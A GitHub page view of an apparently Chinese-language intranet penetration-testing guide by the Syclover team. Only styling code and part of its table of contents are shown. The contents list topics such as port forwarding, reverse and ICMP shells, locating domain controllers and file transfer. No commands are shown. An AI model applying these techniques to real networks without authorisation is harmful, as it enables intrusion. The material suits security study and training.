-
Notifications
You must be signed in to change notification settings - Fork 990
/
README.html
1490 lines (1387 loc) · 92.4 KB
/
README.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>README.html</title>
<meta name="generator" content="Haroopad 0.13.1" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>div.oembedall-githubrepos{border:1px solid #DDD;border-radius:4px;list-style-type:none;margin:0 0 10px;padding:8px 10px 0;font:13.34px/1.4 helvetica,arial,freesans,clean,sans-serif;width:452px;background-color:#fff}div.oembedall-githubrepos .oembedall-body{background:-moz-linear-gradient(center top,#FAFAFA,#EFEFEF);background:-webkit-gradient(linear,left top,left bottom,from(#FAFAFA),to(#EFEFEF));border-bottom-left-radius:4px;border-bottom-right-radius:4px;border-top:1px solid #EEE;margin-left:-10px;margin-top:8px;padding:5px 10px;width:100%}div.oembedall-githubrepos h3{font-size:14px;margin:0;padding-left:18px;white-space:nowrap}div.oembedall-githubrepos p.oembedall-description{color:#444;font-size:12px;margin:0 0 3px}div.oembedall-githubrepos p.oembedall-updated-at{color:#888;font-size:11px;margin:0}div.oembedall-githubrepos ul.oembedall-repo-stats{border:none;float:right;font-size:11px;font-weight:700;padding-left:15px;position:relative;z-index:5;margin:0}div.oembedall-githubrepos ul.oembedall-repo-stats li{border:none;color:#666;display:inline-block;list-style-type:none;margin:0!important}div.oembedall-githubrepos ul.oembedall-repo-stats li a{background-color:transparent;border:none;color:#666!important;background-position:5px -2px;background-repeat:no-repeat;border-left:1px solid #DDD;display:inline-block;height:21px;line-height:21px;padding:0 5px 0 23px}div.oembedall-githubrepos ul.oembedall-repo-stats li:first-child a{border-left:medium none;margin-right:-3px}div.oembedall-githubrepos ul.oembedall-repo-stats li a:hover{background:5px -27px no-repeat #4183C4;color:#FFF!important;text-decoration:none}div.oembedall-githubrepos ul.oembedall-repo-stats li:first-child a:hover{border-bottom-left-radius:3px;border-top-left-radius:3px}ul.oembedall-repo-stats li:last-child a:hover{border-bottom-right-radius:3px;border-top-right-radius:3px}span.oembedall-closehide{background-color:#aaa;border-radius:2px;cursor:pointer;margin-right:3px}div.oembedall-container{margin-top:5px;text-align:left}.oembedall-ljuser{font-weight:700}.oembedall-ljuser img{vertical-align:bottom;border:0;padding-right:1px}.oembedall-stoqembed{border-bottom:1px dotted #999;float:left;overflow:hidden;width:730px;line-height:1;background:#FFF;color:#000;font-family:Arial,Liberation Sans,DejaVu Sans,sans-serif;font-size:80%;text-align:left;margin:0;padding:0}.oembedall-stoqembed a{color:#07C;text-decoration:none;margin:0;padding:0}.oembedall-stoqembed a:hover{text-decoration:underline}.oembedall-stoqembed a:visited{color:#4A6B82}.oembedall-stoqembed h3{font-family:Trebuchet MS,Liberation Sans,DejaVu Sans,sans-serif;font-size:130%;font-weight:700;margin:0;padding:0}.oembedall-stoqembed .oembedall-reputation-score{color:#444;font-size:120%;font-weight:700;margin-right:2px}.oembedall-stoqembed .oembedall-user-info{height:35px;width:185px}.oembedall-stoqembed .oembedall-user-info .oembedall-user-gravatar32{float:left;height:32px;width:32px}.oembedall-stoqembed .oembedall-user-info .oembedall-user-details{float:left;margin-left:5px;overflow:hidden;white-space:nowrap;width:145px}.oembedall-stoqembed .oembedall-question-hyperlink{font-weight:700}.oembedall-stoqembed .oembedall-stats{background:#EEE;margin:0 0 0 7px;padding:4px 7px 6px;width:58px}.oembedall-stoqembed .oembedall-statscontainer{float:left;margin-right:8px;width:86px}.oembedall-stoqembed .oembedall-votes{color:#555;padding:0 0 7px;text-align:center}.oembedall-stoqembed .oembedall-vote-count-post{font-size:240%;color:#808185;display:block;font-weight:700}.oembedall-stoqembed .oembedall-views{color:#999;padding-top:4px;text-align:center}.oembedall-stoqembed .oembedall-status{margin-top:-3px;padding:4px 0;text-align:center;background:#75845C;color:#FFF}.oembedall-stoqembed .oembedall-status strong{color:#FFF;display:block;font-size:140%}.oembedall-stoqembed .oembedall-summary{float:left;width:635px}.oembedall-stoqembed .oembedall-excerpt{line-height:1.2;margin:0;padding:0 0 5px}.oembedall-stoqembed .oembedall-tags{float:left;line-height:18px}.oembedall-stoqembed .oembedall-tags a:hover{text-decoration:none}.oembedall-stoqembed .oembedall-post-tag{background-color:#E0EAF1;border-bottom:1px solid #3E6D8E;border-right:1px solid #7F9FB6;color:#3E6D8E;font-size:90%;line-height:2.4;margin:2px 2px 2px 0;padding:3px 4px;text-decoration:none;white-space:nowrap}.oembedall-stoqembed .oembedall-post-tag:hover{background-color:#3E6D8E;border-bottom:1px solid #37607D;border-right:1px solid #37607D;color:#E0EAF1}.oembedall-stoqembed .oembedall-fr{float:right}.oembedall-stoqembed .oembedall-statsarrow{background-image:url(http://cdn.sstatic.net/stackoverflow/img/sprites.png?v=3);background-repeat:no-repeat;overflow:hidden;background-position:0 -435px;float:right;height:13px;margin-top:12px;width:7px}.oembedall-facebook1{border:1px solid #1A3C6C;padding:0;font:13.34px/1.4 verdana;width:500px}.oembedall-facebook2{background-color:#627add}.oembedall-facebook2 a{color:#e8e8e8;text-decoration:none}.oembedall-facebookBody{background-color:#fff;vertical-align:top;padding:5px}.oembedall-facebookBody .contents{display:inline-block;width:100%}.oembedall-facebookBody div img{float:left;margin-right:5px}div.oembedall-lanyard{-webkit-box-shadow:none;-webkit-transition-delay:0s;-webkit-transition-duration:.4000000059604645s;-webkit-transition-property:width;-webkit-transition-timing-function:cubic-bezier(0.42,0,.58,1);background-attachment:scroll;background-clip:border-box;background-color:transparent;background-image:none;background-origin:padding-box;border-width:0;box-shadow:none;color:#112644;display:block;float:left;font-family:'Trebuchet MS',Trebuchet,sans-serif;font-size:16px;height:253px;line-height:19px;margin:0;max-width:none;min-height:0;outline:#112644 0;overflow-x:visible;overflow-y:visible;padding:0;position:relative;text-align:left;vertical-align:baseline;width:804px}div.oembedall-lanyard .tagline{font-size:1.5em}div.oembedall-lanyard .wrapper{overflow:hidden;clear:both}div.oembedall-lanyard .split{float:left;display:inline}div.oembedall-lanyard .prominent-place .flag:active,div.oembedall-lanyard .prominent-place .flag:focus,div.oembedall-lanyard .prominent-place .flag:hover,div.oembedall-lanyard .prominent-place .flag:link,div.oembedall-lanyard .prominent-place .flag:visited{float:left;display:block;width:48px;height:48px;position:relative;top:-5px;margin-right:10px}div.oembedall-lanyard .place-context{font-size:.889em}div.oembedall-lanyard .prominent-place .sub-place{display:block}div.oembedall-lanyard .prominent-place{font-size:1.125em;line-height:1.1em;font-weight:400}div.oembedall-lanyard .main-date{color:#8CB4E0;font-weight:700;line-height:1.1}div.oembedall-lanyard .first{width:48.57%;margin:0 0 0 2.857%}.mermaid .label{color:#333}.node circle,.node polygon,.node rect{fill:#cde498;stroke:#13540c;stroke-width:1px}.edgePath .path{stroke:green;stroke-width:1.5px}.cluster rect{fill:#cdffb2;rx:40;stroke:#6eaa49;stroke-width:1px}.cluster text{fill:#333}.actor{stroke:#13540c;fill:#cde498}text.actor{fill:#000;stroke:none}.actor-line{stroke:grey}.messageLine0{stroke-width:1.5;stroke-dasharray:"2 2";marker-end:"url(#arrowhead)";stroke:#333}.messageLine1{stroke-width:1.5;stroke-dasharray:"2 2";stroke:#333}#arrowhead{fill:#333}#crosshead path{fill:#333!important;stroke:#333!important}.messageText{fill:#333;stroke:none}.labelBox{stroke:#326932;fill:#cde498}.labelText,.loopText{fill:#000;stroke:none}.loopLine{stroke-width:2;stroke-dasharray:"2 2";marker-end:"url(#arrowhead)";stroke:#326932}.note{stroke:#6eaa49;fill:#fff5ad}.noteText{fill:#000;stroke:none;font-family:'trebuchet ms',verdana,arial;font-size:14px}.section{stroke:none;opacity:.2}.section0,.section2{fill:#6eaa49}.section1,.section3{fill:#fff;opacity:.2}.sectionTitle0,.sectionTitle1,.sectionTitle2,.sectionTitle3{fill:#333}.sectionTitle{text-anchor:start;font-size:11px;text-height:14px}.grid .tick{stroke:lightgrey;opacity:.3;shape-rendering:crispEdges}.grid path{stroke-width:0}.today{fill:none;stroke:red;stroke-width:2px}.task{stroke-width:2}.taskText{text-anchor:middle;font-size:11px}.taskTextOutsideRight{fill:#000;text-anchor:start;font-size:11px}.taskTextOutsideLeft{fill:#000;text-anchor:end;font-size:11px}.taskText0,.taskText1,.taskText2,.taskText3{fill:#fff}.task0,.task1,.task2,.task3{fill:#487e3a;stroke:#13540c}.taskTextOutside0,.taskTextOutside1,.taskTextOutside2,.taskTextOutside3{fill:#000}.active0,.active1,.active2,.active3{fill:#cde498;stroke:#13540c}.activeText0,.activeText1,.activeText2,.activeText3{fill:#000!important}.done0,.done1,.done2,.done3{stroke:grey;fill:lightgrey;stroke-width:2}.doneText0,.doneText1,.doneText2,.doneText3{fill:#000!important}.crit0,.crit1,.crit2,.crit3{stroke:#f88;fill:red;stroke-width:2}.activeCrit0,.activeCrit1,.activeCrit2,.activeCrit3{stroke:#f88;fill:#cde498;stroke-width:2}.doneCrit0,.doneCrit1,.doneCrit2,.doneCrit3{stroke:#f88;fill:lightgrey;stroke-width:2;cursor:pointer;shape-rendering:crispEdges}.activeCritText0,.activeCritText1,.activeCritText2,.activeCritText3,.doneCritText0,.doneCritText1,.doneCritText2,.doneCritText3{fill:#000!important}.titleText{text-anchor:middle;font-size:18px;fill:#000}text{font-family:'trebuchet ms',verdana,arial;font-size:14px}html{height:100%}body{margin:0!important;padding:5px 20px 26px!important;background-color:#fff;font-family:"Lucida Grande","Segoe UI","Apple SD Gothic Neo","Malgun Gothic","Lucida Sans Unicode",Helvetica,Arial,sans-serif;font-size:.9em;overflow-x:hidden;overflow-y:auto}br,h1,h2,h3,h4,h5,h6{clear:both}hr.page{background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x;border:0;height:3px;padding:0}hr.underscore{border-top-style:dashed!important}body >:first-child{margin-top:0!important}img.plugin{box-shadow:0 1px 3px rgba(0,0,0,.1);border-radius:3px}iframe{border:0}figure{-webkit-margin-before:0;-webkit-margin-after:0;-webkit-margin-start:0;-webkit-margin-end:0}kbd{border:1px solid #aaa;-moz-border-radius:2px;-webkit-border-radius:2px;border-radius:2px;-moz-box-shadow:1px 2px 2px #ddd;-webkit-box-shadow:1px 2px 2px #ddd;box-shadow:1px 2px 2px #ddd;background-color:#f9f9f9;background-image:-moz-linear-gradient(top,#eee,#f9f9f9,#eee);background-image:-o-linear-gradient(top,#eee,#f9f9f9,#eee);background-image:-webkit-linear-gradient(top,#eee,#f9f9f9,#eee);background-image:linear-gradient(top,#eee,#f9f9f9,#eee);padding:1px 3px;font-family:inherit;font-size:.85em}.oembeded .oembed_photo{display:inline-block}img[data-echo]{margin:25px 0;width:100px;height:100px;background:url(../img/ajax.gif) center center no-repeat #fff}.spinner{display:inline-block;width:10px;height:10px;margin-bottom:-.1em;border:2px solid rgba(0,0,0,.5);border-top-color:transparent;border-radius:100%;-webkit-animation:spin 1s infinite linear;animation:spin 1s infinite linear}.spinner:after{content:'';display:block;width:0;height:0;position:absolute;top:-6px;left:0;border:4px solid transparent;border-bottom-color:rgba(0,0,0,.5);-webkit-transform:rotate(45deg);transform:rotate(45deg)}@-webkit-keyframes spin{to{-webkit-transform:rotate(360deg)}}@keyframes spin{to{transform:rotate(360deg)}}p.toc{margin:0!important}p.toc ul{padding-left:10px}p.toc>ul{padding:10px;margin:0 10px;display:inline-block;border:1px solid #ededed;border-radius:5px}p.toc li,p.toc ul{list-style-type:none}p.toc li{width:100%;padding:0;overflow:hidden}p.toc li a::after{content:"."}p.toc li a:before{content:"• "}p.toc h5{text-transform:uppercase}p.toc .title{float:left;padding-right:3px}p.toc .number{margin:0;float:right;padding-left:3px;background:#fff;display:none}input.task-list-item{margin-left:-1.62em}.markdown{font-family:"Hiragino Sans GB","Microsoft YaHei",STHeiti,SimSun,"Lucida Grande","Lucida Sans Unicode","Lucida Sans",'Segoe UI',AppleSDGothicNeo-Medium,'Malgun Gothic',Verdana,Tahoma,sans-serif;padding:20px}.markdown a{text-decoration:none;vertical-align:baseline}.markdown a:hover{text-decoration:underline}.markdown h1{font-size:2.2em;font-weight:700;margin:1.5em 0 1em}.markdown h2{font-size:1.8em;font-weight:700;margin:1.275em 0 .85em}.markdown h3{font-size:1.6em;font-weight:700;margin:1.125em 0 .75em}.markdown h4{font-size:1.4em;font-weight:700;margin:.99em 0 .66em}.markdown h5{font-size:1.2em;font-weight:700;margin:.855em 0 .57em}.markdown h6{font-size:1em;font-weight:700;margin:.75em 0 .5em}.markdown h1+p,.markdown h1:first-child,.markdown h2+p,.markdown h2:first-child,.markdown h3+p,.markdown h3:first-child,.markdown h4+p,.markdown h4:first-child,.markdown h5+p,.markdown h5:first-child,.markdown h6+p,.markdown h6:first-child{margin-top:0}.markdown hr{border:1px solid #ccc}.markdown p{margin:1em 0;word-wrap:break-word}.markdown ol{list-style-type:decimal}.markdown li{display:list-item;line-height:1.4em}.markdown blockquote{margin:1em 20px}.markdown blockquote>:first-child{margin-top:0}.markdown blockquote>:last-child{margin-bottom:0}.markdown blockquote cite:before{content:'\2014 \00A0'}.markdown .code{border-radius:3px;word-wrap:break-word}.markdown pre{border-radius:3px;word-wrap:break-word;border:1px solid #ccc;overflow:auto;padding:.5em}.markdown pre code{border:0;display:block}.markdown pre>code{font-family:Consolas,Inconsolata,Courier,monospace;font-weight:700;white-space:pre;margin:0}.markdown code{border-radius:3px;word-wrap:break-word;border:1px solid #ccc;padding:0 5px;margin:0 2px}.markdown img{max-width:100%}.markdown mark{color:#000;background-color:#fcf8e3}.markdown table{padding:0;border-collapse:collapse;border-spacing:0;margin-bottom:16px}.markdown table tr td,.markdown table tr th{border:1px solid #ccc;margin:0;padding:6px 13px}.markdown table tr th{font-weight:700}.markdown table tr th>:first-child{margin-top:0}.markdown table tr th>:last-child{margin-bottom:0}.markdown table tr td>:first-child{margin-top:0}.markdown table tr td>:last-child{margin-bottom:0}@import url(http://fonts.googleapis.com/css?family=Roboto+Condensed:300italic,400italic,700italic,400,300,700);.haroopad{padding:20px;color:#222;font-size:15px;font-family:"Roboto Condensed",Tauri,"Hiragino Sans GB","Microsoft YaHei",STHeiti,SimSun,"Lucida Grande","Lucida Sans Unicode","Lucida Sans",'Segoe UI',AppleSDGothicNeo-Medium,'Malgun Gothic',Verdana,Tahoma,sans-serif;background:#fff;line-height:1.6;-webkit-font-smoothing:antialiased}.haroopad a{color:#3269a0}.haroopad a:hover{color:#4183c4}.haroopad h2{border-bottom:1px solid #e6e6e6}.haroopad h6{color:#777}.haroopad hr{border:1px solid #e6e6e6}.haroopad blockquote>code,.haroopad h1>code,.haroopad h2>code,.haroopad h3>code,.haroopad h4>code,.haroopad h5>code,.haroopad h6>code,.haroopad li>code,.haroopad p>code,.haroopad td>code{font-family:Consolas,"Liberation Mono",Menlo,Courier,monospace;font-size:85%;background-color:rgba(0,0,0,.02);padding:.2em .5em;border:1px solid #efefef}.haroopad pre>code{font-size:1em;letter-spacing:-1px;font-weight:700}.haroopad blockquote{border-left:4px solid #e6e6e6;padding:0 15px;color:#777}.haroopad table{background-color:#fafafa}.haroopad table tr td,.haroopad table tr th{border:1px solid #e6e6e6}.haroopad table tr:nth-child(2n){background-color:#f2f2f2}.hljs{display:block;overflow-x:auto;padding:.5em;background:#fdf6e3;color:#657b83;-webkit-text-size-adjust:none}.diff .hljs-header,.hljs-comment,.hljs-doctype,.hljs-javadoc,.hljs-pi,.lisp .hljs-string{color:#93a1a1}.css .hljs-tag,.hljs-addition,.hljs-keyword,.hljs-request,.hljs-status,.hljs-winutils,.method,.nginx .hljs-title{color:#859900}.hljs-command,.hljs-dartdoc,.hljs-hexcolor,.hljs-link_url,.hljs-number,.hljs-phpdoc,.hljs-regexp,.hljs-rules .hljs-value,.hljs-string,.hljs-tag .hljs-value,.tex .hljs-formula{color:#2aa198}.css .hljs-function,.hljs-built_in,.hljs-chunk,.hljs-decorator,.hljs-id,.hljs-identifier,.hljs-localvars,.hljs-title,.vhdl .hljs-literal{color:#268bd2}.hljs-attribute,.hljs-class .hljs-title,.hljs-constant,.hljs-link_reference,.hljs-parent,.hljs-type,.hljs-variable,.lisp .hljs-body,.smalltalk .hljs-number{color:#b58900}.css .hljs-pseudo,.diff .hljs-change,.hljs-attr_selector,.hljs-cdata,.hljs-header,.hljs-pragma,.hljs-preprocessor,.hljs-preprocessor .hljs-keyword,.hljs-shebang,.hljs-special,.hljs-subst,.hljs-symbol,.hljs-symbol .hljs-string{color:#cb4b16}.hljs-deletion,.hljs-important{color:#dc322f}.hljs-link_label{color:#6c71c4}.tex .hljs-formula{background:#eee8d5}.MathJax_Hover_Frame{border-radius:.25em;-webkit-border-radius:.25em;-moz-border-radius:.25em;-khtml-border-radius:.25em;box-shadow:0 0 15px #83A;-webkit-box-shadow:0 0 15px #83A;-moz-box-shadow:0 0 15px #83A;-khtml-box-shadow:0 0 15px #83A;border:1px solid #A6D!important;display:inline-block;position:absolute}.MathJax_Hover_Arrow{position:absolute;width:15px;height:11px;cursor:pointer}#MathJax_About{position:fixed;left:50%;width:auto;text-align:center;border:3px outset;padding:1em 2em;background-color:#DDD;color:#000;cursor:default;font-family:message-box;font-size:120%;font-style:normal;text-indent:0;text-transform:none;line-height:normal;letter-spacing:normal;word-spacing:normal;word-wrap:normal;white-space:nowrap;float:none;z-index:201;border-radius:15px;-webkit-border-radius:15px;-moz-border-radius:15px;-khtml-border-radius:15px;box-shadow:0 10px 20px gray;-webkit-box-shadow:0 10px 20px gray;-moz-box-shadow:0 10px 20px gray;-khtml-box-shadow:0 10px 20px gray;filter:progid:DXImageTransform.Microsoft.dropshadow(OffX=2, OffY=2, Color='gray', Positive='true')}.MathJax_Menu{position:absolute;background-color:#fff;color:#000;width:auto;padding:2px;border:1px solid #CCC;margin:0;cursor:default;font:menu;text-align:left;text-indent:0;text-transform:none;line-height:normal;letter-spacing:normal;word-spacing:normal;word-wrap:normal;white-space:nowrap;float:none;z-index:201;box-shadow:0 10px 20px gray;-webkit-box-shadow:0 10px 20px gray;-moz-box-shadow:0 10px 20px gray;-khtml-box-shadow:0 10px 20px gray;filter:progid:DXImageTransform.Microsoft.dropshadow(OffX=2, OffY=2, Color='gray', Positive='true')}.MathJax_MenuItem{padding:2px 2em;background:0 0}.MathJax_MenuArrow{position:absolute;right:.5em;color:#666}.MathJax_MenuActive .MathJax_MenuArrow{color:#fff}.MathJax_MenuArrow.RTL{left:.5em;right:auto}.MathJax_MenuCheck{position:absolute;left:.7em}.MathJax_MenuCheck.RTL{right:.7em;left:auto}.MathJax_MenuRadioCheck{position:absolute;left:1em}.MathJax_MenuRadioCheck.RTL{right:1em;left:auto}.MathJax_MenuLabel{padding:2px 2em 4px 1.33em;font-style:italic}.MathJax_MenuRule{border-top:1px solid #CCC;margin:4px 1px 0}.MathJax_MenuDisabled{color:GrayText}.MathJax_MenuActive{background-color:Highlight;color:HighlightText}.MathJax_Menu_Close{position:absolute;width:31px;height:31px;top:-15px;left:-15px}#MathJax_Zoom{position:absolute;background-color:#F0F0F0;overflow:auto;display:block;z-index:301;padding:.5em;border:1px solid #000;margin:0;font-weight:400;font-style:normal;text-align:left;text-indent:0;text-transform:none;line-height:normal;letter-spacing:normal;word-spacing:normal;word-wrap:normal;white-space:nowrap;float:none;box-shadow:5px 5px 15px #AAA;-webkit-box-shadow:5px 5px 15px #AAA;-moz-box-shadow:5px 5px 15px #AAA;-khtml-box-shadow:5px 5px 15px #AAA;filter:progid:DXImageTransform.Microsoft.dropshadow(OffX=2, OffY=2, Color='gray', Positive='true')}#MathJax_ZoomOverlay{position:absolute;left:0;top:0;z-index:300;display:inline-block;width:100%;height:100%;border:0;padding:0;margin:0;background-color:#fff;opacity:0;filter:alpha(opacity=0)}#MathJax_ZoomFrame{position:relative;display:inline-block;height:0;width:0}#MathJax_ZoomEventTrap{position:absolute;left:0;top:0;z-index:302;display:inline-block;border:0;padding:0;margin:0;background-color:#fff;opacity:0;filter:alpha(opacity=0)}.MathJax_Preview{color:#888}#MathJax_Message{position:fixed;left:1px;bottom:2px;background-color:#E6E6E6;border:1px solid #959595;margin:0;padding:2px 8px;z-index:102;color:#000;font-size:80%;width:auto;white-space:nowrap}#MathJax_MSIE_Frame{position:absolute;top:0;left:0;width:0;z-index:101;border:0;margin:0;padding:0}.MathJax_Error{color:#C00;font-style:italic}footer{position:fixed;font-size:.8em;text-align:right;bottom:0;margin-left:-25px;height:20px;width:100%}</style>
</head>
<body class="markdown haroopad">
<p>Team:Syclover<br>Author:L3m0n<br>Email:[email protected]</p><p class="toc" style="undefined"></p><ul>
<li><ul>
<li><ul>
<li><span class="title">
<a href="#域环境搭建" title="域环境搭建">域环境搭建</a>
</span>
<!--span class="number">
0
</span-->
</li>
<li><span class="title">
<a href="#端口转发&&边界代理" title="端口转发&&边界代理">端口转发&&边界代理</a>
</span>
<!--span class="number">
1
</span-->
<ul>
<li><ul>
<li><span class="title">
<a href="#端口转发" title="端口转发">端口转发</a>
</span>
<!--span class="number">
2
</span-->
</li>
<li><span class="title">
<a href="#socket代理" title="socket代理">socket代理</a>
</span>
<!--span class="number">
3
</span-->
</li>
<li><span class="title">
<a href="#神器推荐" title="神器推荐">神器推荐</a>
</span>
<!--span class="number">
4
</span-->
</li>
<li><span class="title">
<a href="#基于http的转发与socket代理(低权限下的渗透)" title="基于http的转发与socket代理(低权限下的渗透)">基于http的转发与socket代理(低权限下的渗透)</a>
</span>
<!--span class="number">
5
</span-->
</li>
<li><span class="title">
<a href="#ssh通道" title="ssh通道">ssh通道</a>
</span>
<!--span class="number">
6
</span-->
</li>
</ul>
</li>
</ul>
</li>
<li><span class="title">
<a href="#获取shell" title="获取shell">获取shell</a>
</span>
<!--span class="number">
7
</span-->
<ul>
<li><ul>
<li><span class="title">
<a href="#常规shell反弹" title="常规shell反弹">常规shell反弹</a>
</span>
<!--span class="number">
8
</span-->
</li>
<li><span class="title">
<a href="#突破防火墙的imcp_shell反弹" title="突破防火墙的imcp_shell反弹">突破防火墙的imcp_shell反弹</a>
</span>
<!--span class="number">
9
</span-->
</li>
<li><span class="title">
<a href="#shell反弹不出的时候" title="Shell反弹不出的时候">Shell反弹不出的时候</a>
</span>
<!--span class="number">
10
</span-->
</li>
<li><span class="title">
<a href="#正向shell" title="正向shell">正向shell</a>
</span>
<!--span class="number">
11
</span-->
</li>
</ul>
</li>
</ul>
</li>
<li><span class="title">
<a href="#信息收集(结构分析)" title="信息收集(结构分析)">信息收集(结构分析)</a>
</span>
<!--span class="number">
12
</span-->
<ul>
<li><ul>
<li><span class="title">
<a href="#基本命令" title="基本命令">基本命令</a>
</span>
<!--span class="number">
13
</span-->
</li>
<li><span class="title">
<a href="#定位域控" title="定位域控">定位域控</a>
</span>
<!--span class="number">
14
</span-->
</li>
<li><span class="title">
<a href="#端口收集" title="端口收集">端口收集</a>
</span>
<!--span class="number">
15
</span-->
</li>
<li><span class="title">
<a href="#扫描分析" title="扫描分析">扫描分析</a>
</span>
<!--span class="number">
16
</span-->
</li>
</ul>
</li>
</ul>
</li>
<li><span class="title">
<a href="#内网文件传输" title="内网文件传输">内网文件传输</a>
</span>
<!--span class="number">
17
</span-->
<ul>
<li><ul>
<li><span class="title">
<a href="#windows下文件传输" title="windows下文件传输">windows下文件传输</a>
</span>
<!--span class="number">
18
</span-->
</li>
<li><span class="title">
<a href="#linux下文件传输" title="linux下文件传输">linux下文件传输</a>
</span>
<!--span class="number">
19
